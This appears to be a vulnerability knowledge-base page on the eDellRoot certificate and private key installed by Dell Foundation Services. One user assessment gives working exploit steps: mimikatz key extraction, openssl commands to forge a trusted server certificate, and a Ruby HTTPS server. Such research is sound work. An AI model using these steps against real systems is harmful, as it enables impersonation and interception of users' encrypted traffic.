Very High
Dell Foundation Services installs root certificate and private key (eDellRoot)
CVE ID
AttackerKB requires a CVE ID in order to pull vulnerability data and references from the CVE list and the National Vulnerability Database. If available, please supply below:
Add References:
Very High
(2 users assessed)
Moderate
(2 users assessed)Unknown
Unknown
Unknown
Dell Foundation Services installs root certificate and private key (eDellRoot)
MITRE ATT&CK
Collection
Command and Control
Credential Access
Defense Evasion
Discovery
Execution
Exfiltration
Impact
Initial Access
Lateral Movement
Persistence
Privilege Escalation
Topic Tags
Description
Dell Foundation Services installs the eDellRoot certificate into theTrusted Root Certificate Store on Microsoft Windows systems. The certificate includes the private key. This allows attackers to create trusted certificates and perform impersonation, man-in-the-middle (MiTM), and passive decryption attacks, resulting in the exposure of sensitive information.
Add Assessment
Technical Analysis
Details
How to exploit:
- Export the DER CA certificate (through the windows certificate manager for example).
- Covert DER CA certificate to PEM
openssl x509 -in der_edell_root.cer -inform der -outform pem -out edell_root.pem
- Export the certificate private key, use mimikatz
crypto::certificates /systemstore:local_machine /store:Root /export
The certificate (again) and its private key will be in the directory where mimikatz lives. The private key is inside the .pfx
- Extract the key from the pfx and save as pem (password: mimikatz)
openssl pkcs12 -in local_machine_Root_3_eDellRoot.pfx -nocerts -out key.pem -nodes
Save the file.srl with “6C”
Create a server certificate request
openssl genrsa -out server.key 1024 openssl req -key server.key -new -out server.req
Use the CA certificate and its private key to generate the server certificate:
openssl x509 -req -in server.req -CA edell_root.pem -CAkey key.pem -CAserial file.srl -out server.pem
profit!
require 'webrick' require 'webrick/https' require 'openssl' cert = OpenSSL::X509::Certificate.new(File.read('server.pem')) pkey = OpenSSL::PKey::RSA.new(File.read('server.key')) server = WEBrick::HTTPServer.new(:Port => 8000, :SSLEnable => true, :SSLCertificate => cert, :SSLPrivateKey => pkey) server.start
Go to localhost:8000/test.html, you should see that eDellRoot has identified the site as localhos,
and that your connection is trusted.
Would you also like to delete your Exploited in the Wild Report?
Delete Assessment Only Delete Assessment and Exploited in the Wild Report
Ratings
-
Attacker ValueVery High
-
ExploitabilityMedium
Technical Analysis
It’s terrifying that this certificate supports all issuance and application policies. Reddit users have proven that this can be used to MitM HTTPS-encrypted web browsing, as well as to sign code. It’s unclear as to whether the certificate is unique to each install (which would turn this into maybe a local privesc, or whether the certificate is shared across all installs, at which point this becomes a threat to any Dell user on a compromised network.
It’s also worth pointing out that some users didn’t have the certificate described, but then had it added later after running updates. So sysadmins might have checked for this, but then had their workstations put into a vulnerable state afterwards.
Would you also like to delete your Exploited in the Wild Report?
Delete Assessment Only Delete Assessment and Exploited in the Wild ReportGeneral Information
References
Additional Info
Technical Analysis
Report as Emergent Threat Response
Report as Exploited in the Wild
CVE ID
AttackerKB requires a CVE ID in order to pull vulnerability data and references from the CVE list and the National Vulnerability Database. If available, please supply below:
